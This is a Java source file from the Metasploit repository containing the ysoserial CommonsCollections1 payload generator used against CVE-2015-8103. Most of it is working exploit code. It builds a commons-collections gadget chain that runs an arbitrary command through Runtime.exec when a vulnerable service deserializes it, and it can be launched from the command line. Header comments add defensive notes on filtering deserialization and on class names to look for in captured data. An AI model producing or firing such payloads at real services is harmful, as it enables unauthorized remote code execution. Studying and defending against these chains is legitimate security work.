GitHub Repository: rapid7/metasploit-framework
Path: blob/master/external/source/exploits/CVE-2015-8103/payloads/CommonsCollections1.java
package ysoserial.payloads;
import java.lang.reflect.InvocationHandler;
import java.util.HashMap;
import java.util.Map;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.util.Gadgets;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;
/*
 * Java-deserialization gadget chain assembled from commons-collections functors.
 *
 * Gadget chain (call sequence on the deserializing side, as recorded by the author):
 *   ObjectInputStream.readObject()
 *   AnnotationInvocationHandler.readObject()
 *   Map(Proxy).entrySet()
 *   AnnotationInvocationHandler.invoke()
 *   LazyMap.get()
 *   ChainedTransformer.transform()
 *   ConstantTransformer.transform()
 *   InvokerTransformer.transform()
 *   Method.invoke()
 *   Class.getMethod()
 *   InvokerTransformer.transform()
 *   Method.invoke()
 *   Runtime.getRuntime()
 *   InvokerTransformer.transform()
 *   Method.invoke()
 *   Runtime.exec()
 *
 * Requires:
 *   commons-collections
 *
 * Reviewer notes (defensive reading):
 *   - Every step above is an ordinary JDK or library class. The sink is reached only
 *     because a service calls ObjectInputStream.readObject() on bytes it does not
 *     control while the library named in @Dependencies is on its classpath.
 *   - Removing one library does not close the class of bug; restrict which classes a
 *     stream may instantiate (for example with java.io.ObjectInputFilter) or avoid
 *     native deserialization of untrusted input altogether.
 *   - A serialized stream built from this chain carries the functor class names used
 *     below (org.apache.commons.collections.functors.InvokerTransformer and friends),
 *     which is a practical string to look for when inspecting captured serialized data.
 */
@SuppressWarnings({"rawtypes", "unchecked"})
@Dependencies({"commons-collections:commons-collections:3.1"})
public class CommonsCollections1 extends PayloadRunner implements ObjectPayload<InvocationHandler> {

    /**
     * Builds the object graph described in the file header.
     *
     * <p>The graph is wired up around a harmless placeholder chain first and the real
     * transformer array is swapped in only as the last step, so the statement order in
     * this method is significant.
     *
     * @param command string handed, as the single argument, to the final {@code exec} step
     * @return the handler returned by {@code Gadgets.createMemoizedInvocationHandler}
     * @throws Exception whatever the {@code Gadgets} / {@code Reflections} helpers raise
     *         (their implementations are not part of this file)
     */
    public InvocationHandler getObject(final String command) throws Exception {
        final String[] execArgs = { command };

        // Placeholder chain: it only yields the constant 1, so map lookups performed
        // while the graph is being built have no effect.
        final Transformer[] placeholderSteps = { new ConstantTransformer(1) };
        final Transformer placeholderChain = new ChainedTransformer(placeholderSteps);

        // Signatures and arguments for the three reflective calls, named for readability.
        final Class[] getMethodSignature = { String.class, Class[].class };
        final Object[] getMethodArguments = { "getRuntime", new Class[0] };
        final Class[] invokeSignature = { Object.class, Object[].class };
        final Object[] invokeArguments = { null, new Object[0] };
        final Class[] execSignature = { String.class };

        // The chain that is installed once setup is complete; the trailing constant
        // makes the overall transform return 1, as the placeholder does.
        final Transformer[] armedSteps = {
            new ConstantTransformer(Runtime.class),
            new InvokerTransformer("getMethod", getMethodSignature, getMethodArguments),
            new InvokerTransformer("invoke", invokeSignature, invokeArguments),
            new InvokerTransformer("exec", execSignature, execArgs),
            new ConstantTransformer(1)
        };

        final Map backingMap = new HashMap();
        final Map lazyView = LazyMap.decorate(backingMap, placeholderChain);

        // Both helpers live in Gadgets and are not visible here; per the chain in the
        // header they presumably wrap the map in AnnotationInvocationHandler-backed
        // proxies -- confirm against Gadgets before relying on that.
        final Map proxiedMap = Gadgets.createMemoitizedProxy(lazyView, Map.class);
        final InvocationHandler outerHandler = Gadgets.createMemoizedInvocationHandler(proxiedMap);

        // Last step: overwrite the placeholder's private transformer array with the
        // real one. Doing this any earlier would let setup-time lookups run the chain.
        Reflections.setFieldValue(placeholderChain, "iTransformers", armedSteps);

        return outerHandler;
    }

    /**
     * Command-line entry point; hands this class and the raw arguments to
     * {@code PayloadRunner.run}.
     *
     * @param args command-line arguments, forwarded unchanged
     * @throws Exception propagated from {@code PayloadRunner.run}
     */
    public static void main(final String[] args) throws Exception {
        PayloadRunner.run(CommonsCollections1.class, args);
    }
}